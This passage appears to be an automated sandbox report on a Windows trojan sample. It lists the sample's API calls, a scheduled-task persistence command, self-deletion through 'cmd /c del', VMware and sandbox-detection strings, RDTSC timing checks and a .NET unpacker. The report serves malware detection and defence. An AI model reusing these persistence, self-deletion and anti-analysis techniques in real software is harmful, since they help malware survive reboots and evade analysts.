Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C9B00 NtSetValueKey,	20_2_050C9B00
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050CA710 NtOpenProcessToken,	20_2_050CA710
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C9730 NtQueryVirtualMemory,	20_2_050C9730
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C9760 NtOpenProcess,	20_2_050C9760
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C9770 NtSetInformationFile,	20_2_050C9770
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050CA770 NtOpenThread,	20_2_050CA770
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C97A0 NtUnmapViewOfSection,	20_2_050C97A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050CA3B0 NtGetContextThread,	20_2_050CA3B0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C9A00 NtProtectVirtualMemory,	20_2_050C9A00
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C9610 NtEnumerateValueKey,	20_2_050C9610
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C9A10 NtQuerySection,	20_2_050C9A10
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C9A20 NtResumeThread,	20_2_050C9A20
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C9670 NtQueryInformationProcess,	20_2_050C9670
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C9A80 NtOpenDirectoryObject,	20_2_050C9A80
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_02ED82F0 NtClose,	20_2_02ED82F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_02ED8270 NtReadFile,	20_2_02ED8270
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_02ED83A0 NtAllocateVirtualMemory,	20_2_02ED83A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_02ED81C0 NtCreateFile,	20_2_02ED81C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_02ED82EA NtClose,	20_2_02ED82EA
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_02ED826A NtReadFile,	20_2_02ED826A
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_02ED839A NtAllocateVirtualMemory,	20_2_02ED839A
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_02ED81BA NtCreateFile,	20_2_02ED81BA

Source: tgamf4XuLa.exe	Binary or memory string: OriginalFilename vs tgamf4XuLa.exe
Source: tgamf4XuLa.exe, 00000000.00000000.224546803.00000000006A2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameFormatt.exe4 vs tgamf4XuLa.exe
Source: tgamf4XuLa.exe, 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameCF_Secretaria.dll< vs tgamf4XuLa.exe
Source: tgamf4XuLa.exe, 00000000.00000002.236927169.00000000029DB000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameEnvoySinks.dll6 vs tgamf4XuLa.exe
Source: tgamf4XuLa.exe	Binary or memory string: OriginalFilename vs tgamf4XuLa.exe
Source: tgamf4XuLa.exe, 00000006.00000002.339403773.0000000000862000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameFormatt.exe4 vs tgamf4XuLa.exe
Source: tgamf4XuLa.exe, 00000006.00000002.343404055.0000000001385000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenameCONTROL.EXEj% vs tgamf4XuLa.exe
Source: tgamf4XuLa.exe, 00000006.00000002.343854917.000000000169F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs tgamf4XuLa.exe
Source: tgamf4XuLa.exe	Binary or memory string: OriginalFilenameFormatt.exe4 vs tgamf4XuLa.exe

Source: tgamf4XuLa.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: HpnpObXJP.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\tgamf4XuLa.exe

File read: C:\Users\user\Desktop\tgamf4XuLa.exe

Jump to behavior

Source: tgamf4XuLa.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\tgamf4XuLa.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\tgamf4XuLa.exe 'C:\Users\user\Desktop\tgamf4XuLa.exe'
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HpnpObXJP' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process created: C:\Users\user\Desktop\tgamf4XuLa.exe C:\Users\user\Desktop\tgamf4XuLa.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\tgamf4XuLa.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HpnpObXJP' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process created: C:\Users\user\Desktop\tgamf4XuLa.exe C:\Users\user\Desktop\tgamf4XuLa.exe	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\tgamf4XuLa.exe'	Jump to behavior

Source: C:\Users\user\Desktop\tgamf4XuLa.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\tgamf4XuLa.exe

File created: C:\Users\user\AppData\Roaming\HpnpObXJP.exe

Jump to behavior

Source: C:\Users\user\Desktop\tgamf4XuLa.exe

File created: C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@10/4@10/7

Source: C:\Users\user\Desktop\tgamf4XuLa.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\tgamf4XuLa.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4704:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6436:120:WilError_01

Source: tgamf4XuLa.exe, Forms/mainForm.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: HpnpObXJP.exe.0.dr, Forms/mainForm.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.0.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 6.2.tgamf4XuLa.exe.860000.1.unpack, Forms/mainForm.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 6.0.tgamf4XuLa.exe.860000.0.unpack, Forms/mainForm.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\tgamf4XuLa.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: tgamf4XuLa.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: tgamf4XuLa.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: tgamf4XuLa.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: control.pdb source: tgamf4XuLa.exe, 00000006.00000002.343389175.0000000001380000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdbUGP source: tgamf4XuLa.exe, 00000006.00000002.343446284.00000000013F0000.00000040.00000001.sdmp, control.exe, 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: tgamf4XuLa.exe, 00000006.00000002.343446284.00000000013F0000.00000040.00000001.sdmp, control.exe
Source:	Binary string: control.pdbUGP source: tgamf4XuLa.exe, 00000006.00000002.343389175.0000000001380000.00000040.00020000.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: tgamf4XuLa.exe, Forms/mainForm.cs	.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: HpnpObXJP.exe.0.dr, Forms/mainForm.cs	.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.cs	.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.cs	.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.2.tgamf4XuLa.exe.860000.1.unpack, Forms/mainForm.cs	.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.0.tgamf4XuLa.exe.860000.0.unpack, Forms/mainForm.cs	.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Code function: 6_2_0041B3B5 push eax; ret	6_2_0041B408
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Code function: 6_2_0041B46C push eax; ret	6_2_0041B472
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Code function: 6_2_0041B402 push eax; ret	6_2_0041B408
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Code function: 6_2_0041B40B push eax; ret	6_2_0041B472
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050DD0D1 push ecx; ret	20_2_050DD0E4
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_02EDBA79 push 67258780h; ret	20_2_02EDBA7E
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_02EDB3B5 push eax; ret	20_2_02EDB408
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_02EC0008 push edx; retf	20_2_02EC0009
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_02EDC16B pushad ; ret	20_2_02EDC171
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_02EDB46C push eax; ret	20_2_02EDB472
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_02EDB40B push eax; ret	20_2_02EDB472
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_02EDB402 push eax; ret	20_2_02EDB408

Source: tgamf4XuLa.exe

Static PE information: 0x960770CE [Tue Oct 5 18:07:10 2049 UTC]

Source: initial sample	Static PE information: section name: .text entropy: 7.16093944862
Source: initial sample	Static PE information: section name: .text entropy: 7.16093944862

Source: C:\Users\user\Desktop\tgamf4XuLa.exe

File created: C:\Users\user\AppData\Roaming\HpnpObXJP.exe

Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Users\user\Desktop\tgamf4XuLa.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HpnpObXJP' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp'

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Windows\SysWOW64\control.exe	Process created: /c del 'C:\Users\user\Desktop\tgamf4XuLa.exe'
Source: C:\Windows\SysWOW64\control.exe	Process created: /c del 'C:\Users\user\Desktop\tgamf4XuLa.exe'			Jump to behavior

Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tgamf4XuLa.exe PID: 6056, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\tgamf4XuLa.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 0000000002EC85E4 second address: 0000000002EC85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 0000000002EC897E second address: 0000000002EC8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\tgamf4XuLa.exe TID: 6060	Thread sleep time: -44461s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe TID: 5884	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4420	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 6580	Thread sleep time: -34000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\tgamf4XuLa.exe

Code function: 6_2_004088B0 rdtsc

6_2_004088B0

Source: C:\Users\user\Desktop\tgamf4XuLa.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\tgamf4XuLa.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Thread delayed: delay time: 44461			Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000007.00000000.259302973.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000007.00000000.259302973.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000007.00000000.264627879.00000000089F9000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.259017685.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000007.00000000.280424051.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 00000007.00000000.259302973.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000007.00000000.259302973.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000007.00000000.259457359.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000007.00000000.250866247.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000007.00000000.264627879.00000000089F9000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S
Source: explorer.exe, 00000007.00000000.313443511.0000000008815000.00000004.00000001.sdmp	Binary or memory string: _VMware_SATA_CD00#5&X
Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Source: C:\Users\user\Desktop\tgamf4XuLa.exe

Code function: 6_2_004088B0 rdtsc

6_2_004088B0

Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05089100 mov eax, dword ptr fs:[00000030h]	20_2_05089100
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05089100 mov eax, dword ptr fs:[00000030h]	20_2_05089100
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05089100 mov eax, dword ptr fs:[00000030h]	20_2_05089100
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05158D34 mov eax, dword ptr fs:[00000030h]	20_2_05158D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0510A537 mov eax, dword ptr fs:[00000030h]	20_2_0510A537
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050A4120 mov eax, dword ptr fs:[00000030h]	20_2_050A4120
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050A4120 mov eax, dword ptr fs:[00000030h]	20_2_050A4120
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050A4120 mov eax, dword ptr fs:[00000030h]	20_2_050A4120
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050A4120 mov eax, dword ptr fs:[00000030h]	20_2_050A4120
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050A4120 mov ecx, dword ptr fs:[00000030h]	20_2_050A4120
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B4D3B mov eax, dword ptr fs:[00000030h]	20_2_050B4D3B
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B4D3B mov eax, dword ptr fs:[00000030h]	20_2_050B4D3B
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B4D3B mov eax, dword ptr fs:[00000030h]	20_2_050B4D3B
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B513A mov eax, dword ptr fs:[00000030h]	20_2_050B513A
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B513A mov eax, dword ptr fs:[00000030h]	20_2_050B513A
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0508AD30 mov eax, dword ptr fs:[00000030h]	20_2_0508AD30
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05093D34 mov eax, dword ptr fs:[00000030h]	20_2_05093D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05093D34 mov eax, dword ptr fs:[00000030h]	20_2_05093D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05093D34 mov eax, dword ptr fs:[00000030h]	20_2_05093D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05093D34 mov eax, dword ptr fs:[00000030h]	20_2_05093D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05093D34 mov eax, dword ptr fs:[00000030h]	20_2_05093D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05093D34 mov eax, dword ptr fs:[00000030h]	20_2_05093D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05093D34 mov eax, dword ptr fs:[00000030h]	20_2_05093D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05093D34 mov eax, dword ptr fs:[00000030h]	20_2_05093D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05093D34 mov eax, dword ptr fs:[00000030h]	20_2_05093D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05093D34 mov eax, dword ptr fs:[00000030h]	20_2_05093D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05093D34 mov eax, dword ptr fs:[00000030h]	20_2_05093D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05093D34 mov eax, dword ptr fs:[00000030h]	20_2_05093D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05093D34 mov eax, dword ptr fs:[00000030h]	20_2_05093D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050AB944 mov eax, dword ptr fs:[00000030h]	20_2_050AB944
